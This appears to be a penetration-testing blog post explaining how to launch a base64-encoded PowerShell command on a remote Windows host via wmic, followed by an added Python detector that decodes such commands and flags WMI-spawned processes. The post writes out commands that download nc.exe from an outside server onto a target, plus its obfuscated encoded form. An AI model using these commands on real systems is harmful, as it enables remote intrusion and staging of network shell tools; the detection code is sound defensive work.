Let's again introduce a variant of the previous article.
Ideally we would be using the Windows built-in wmic command rather than the nthash runwmi verb.
Unfortunately, wmic can be a pain with escaping characters in some situations, especially when combined with PowerShell.
The command below, for instance, won't work because of the ',' comma character.
wmic /node:target process call create "powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('https://erwan.labalec.fr/uploads/nc.exe','c:\temp\nc.exe')"
The trick/workaround is to base64-encode the PowerShell command as Unicode (UTF-16LE), which is the encoding powershell.exe expects for -encodedcommand.
NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');
Which gives you the following:
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=
You can then execute a PowerShell command on a remote target using wmic, like below:
wmic /node:target process call create "powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA="
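From the defender's side, the useful fact in the procedure above is that -encodedcommand carries nothing more than base64 over the UTF-16LE bytes of the script, so the original command can be recovered from any process-creation log that records the command line. The Python below is an added example, not code from the original post or from the nthash tool: it decodes such an argument, round-trips the exact string shown above to confirm the "Unicode" encoding is UTF-16LE, and triages constructed Sysmon-style process events. The event records, their field names (Image, ParentImage, CommandLine) and the WmiPrvSE.exe parent check are assumptions made for the example, modelled on how processes created through WMI appear in process-creation telemetry.

```python
import base64
import binascii
import re

# The -encodedcommand argument exactly as it appears in the wmic line above.
PAGE_ENCODED = (
    "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0"
    "ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEA"
    "YgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBt"
    "AHAAXABuAGMALgBlAHgAZQAnACkAOwA="
)

# powershell.exe accepts abbreviations of -EncodedCommand (-e, -ec, -enc, ...),
# so match the prefix forms, then grab the contiguous base64 token that follows.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Substrings worth surfacing when they appear in a decoded script (assumed list).
SUSPICIOUS = ("Net.WebClient", "DownloadFile", "DownloadString", "IEX", "Invoke-Expression")


def encode_powershell(command: str) -> str:
    """Encode the way powershell.exe expects: UTF-16LE ("Unicode") bytes, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Return the plaintext script, or None if the token is not valid base64/UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:          # UTF-16 payloads always have an even byte length
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def inspect_command_line(cmdline: str) -> dict:
    """Find an encoded-command argument, decode it and list the indicators it contains."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return {"encoded": False, "script": None, "indicators": []}
    script = decode_encoded_command(match.group(1))
    indicators = [s for s in SUSPICIOUS if script and s.lower() in script.lower()]
    return {"encoded": True, "script": script, "indicators": indicators}


def triage(event: dict) -> dict:
    """Score one process-creation event (field names assumed, Sysmon Event ID 1 style)."""
    result = inspect_command_line(event.get("CommandLine", ""))
    # Processes started through WMI "process call create" are children of WmiPrvSE.exe.
    result["wmi_spawned"] = event.get("ParentImage", "").lower().endswith("\\wmiprvse.exe")
    result["alert"] = result["wmi_spawned"] or bool(result["indicators"])
    return result


# Constructed sample events: one mirroring the wmic launch above, one benign baseline.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "powershell.exe -encodedcommand " + PAGE_ENCODED,
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = triage(event)
        print("ALERT" if verdict["alert"] else "ok   ", event["ParentImage"])
        if verdict["script"]:
            print("  decoded:", verdict["script"])
            print("  indicators:", verdict["indicators"])
```

Decoding the page's own token yields the exact DownloadFile one-liner fed to nthash, and re-encoding that plaintext reproduces the token byte for byte, which is what shows that "Unicode" here means UTF-16LE without a byte-order mark. The parent-process check is independent of the encoding and catches the WMI launch even when the payload is not encoded at all.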